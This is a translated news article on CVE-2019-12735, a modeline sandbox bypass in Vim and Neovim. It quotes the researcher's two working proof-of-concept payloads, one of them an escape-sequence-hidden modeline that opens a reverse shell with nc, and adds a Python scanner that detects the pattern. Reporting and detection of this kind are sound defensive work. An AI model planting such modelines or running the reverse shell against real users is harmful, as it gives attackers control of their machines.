Vim and Neovim exposed to arbitrary code execution vulnerability

Security researchers have found that Vim and Neovim contain an arbitrary code execution vulnerability that lets an attacker take control of a user's computer when the user opens a crafted text file. The vulnerability affects all Vim versions before 8.1.1365 and all Neovim versions before 0.3.6.

The vulnerability lies in the editor's modeline feature, which lets the user set the window size and other customization options in a line at the beginning or end of a text file. Modeline commands run in a sandbox that blocks access to the operating system and restricts the commands that can be used, but researcher Arminius found a way to bypass that protection.

The vulnerability has been assigned CVE-2019-12735, and Arminius has also published two proofs of concept.

The first exploits the vulnerability directly to run the `uname -a` command:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

The second goes further: once the user opens the file, it automatically starts a reverse shell. To hide the attack, the file is rewritten immediately when it is opened. In addition, the modeline is hidden with terminal escape sequences so that it does not appear when the file's content is printed with cat:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
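As an added example (not part of the original article or of Arminius's advisory), the following Python scanner checks only the first and last five lines of a file, the region Vim reads modelines from with the default 'modelines' setting, strips terminal escape sequences of the kind used above, and flags any modeline whose 'foldexpr' wraps assert_fails(). The sample inputs are constructed; the hidden-modeline sample follows the second PoC's layout with the reverse-shell command removed.

```python
"""Scan text for Vim modelines carrying the CVE-2019-12735 bypass pattern."""
import re
MODELINES = 5  # Vim's default 'modelines': only the first/last 5 lines are parsed
# A modeline: "vi:", "vim:", "Vi:" or "ex:" at line start or after whitespace,
# optionally followed by "set"/"se" (Vim's second modeline form).
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vi|ex):\s*(.*)$")
# CSI sequences, two-byte ESC sequences and other C0 control bytes (e.g. \x16).
ESCAPE_RE = re.compile(r"\x1b\[[0-9;?]*[A-Za-z]|\x1b.|[\x00-\x08\x0b-\x1f]")
# The bypass: 'foldexpr' (evaluated under 'foldmethod=expr') wrapping assert_fails().
BYPASS_RE = re.compile(r"(?:fde|foldexpr)=\s*assert_fails\s*\(")

# Constructed samples: the advisory's first PoC, an escape-hidden modeline in the
# style of the second PoC (reverse-shell command removed), and a benign modeline.
POC_SIMPLE = ':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\\!\\ \\%"):fdl=0:fdt="\n'
POC_HIDDEN = ('\x1b[?7l\x1bSNothing here.\x1b:silent! # " vim: set fen fdm=expr '
              'fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: '
              '\x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n')
BENIGN = "# vim: set ts=4 sw=4 et:\nprint('hello')\n"

def strip_escapes(line: str) -> str:
    """Remove terminal escape/control sequences so hidden modelines become visible."""
    return ESCAPE_RE.sub("", line)

def find_modelines(text: str):
    """Yield (line_number, options) for lines Vim would actually parse as modelines."""
    lines = text.splitlines()
    candidates = list(enumerate(lines[:MODELINES], 1))
    if len(lines) > MODELINES:  # tail window, without re-counting the head
        start = max(MODELINES, len(lines) - MODELINES)
        candidates += list(enumerate(lines[start:], start + 1))
    for num, raw in candidates:
        m = MODELINE_RE.search(strip_escapes(raw))
        if m:
            yield num, m.group(1)

def scan(text: str) -> list:
    """Return findings as (line_number, reason, options) tuples."""
    findings = []
    for num, opts in find_modelines(text):
        if BYPASS_RE.search(opts):
            reason = "assert_fails() in 'foldexpr' (CVE-2019-12735 bypass pattern)"
        else:
            reason = "modeline present"
        findings.append((num, reason, opts))
    return findings

if __name__ == "__main__":
    for name, sample in [("poc_simple", POC_SIMPLE), ("poc_hidden", POC_HIDDEN), ("benign", BENIGN)]:
        for num, reason, opts in scan(sample):
            print(f"{name}:{num}: {reason}: {opts}")
```

A modeline in the middle of a longer file is deliberately not reported, because Vim never parses it there.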

A patch has already been released.

For more details, see:

https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md


Source: www.oschina.net/news/107441/vim-neovim-arbitrary-code-execution